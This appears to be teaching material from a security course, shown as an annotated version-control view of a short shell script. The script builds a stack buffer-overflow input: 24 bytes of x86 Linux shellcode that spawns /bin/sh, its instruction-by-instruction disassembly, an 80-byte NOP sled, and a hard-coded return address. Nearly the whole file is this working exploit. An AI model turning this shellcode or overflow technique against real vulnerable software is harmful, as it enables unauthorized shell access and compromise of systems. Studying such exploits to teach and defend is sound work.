sen-material: programs/args3@d53d7d61f37b (annotated)

27 5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	1	#!/bin/sh
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	2
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	3	// shellscript that overwrites the buffer with
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	4	// some payload for opening a shell (the payload
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	5	// cannot contain any \x00)
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	6
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	7
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	8	shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	9
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	10	# 24 bytes of shellcode
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	11
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	12	# "\x31\xc0" // xorl %eax,%eax
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	13	# "\x50" // pushl %eax
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	14	# "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	15	# "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	16	# "\x89\xe3" // movl %esp,%ebx
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	17	# "\x99" // cltd
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	18	# "\x52" // pushl %edx
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	19	# "\x53" // pushl %ebx
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	20	# "\x89\xe1" // movl %esp,%ecx
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	21	# "\xb0\x0b" // movb $0xb,%al
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	22	# "\xcd\x80" // int $0x80
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	23
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	24	padding=`perl -e 'print "\x90" x 80'`
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	25
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	26	// need s correct address in order to run
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	27	printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
5bf1f248407c C3 Christian Urban <urbanc@in.tum.de> parents: diff changeset	28

author	Christian Urban <urbanc@in.tum.de>
	Tue, 13 Nov 2012 00:22:28 +0000
changeset 64	d53d7d61f37b
parent 27	5bf1f248407c
child 115	c4008b31df8e
permissions	-rwxr-xr-x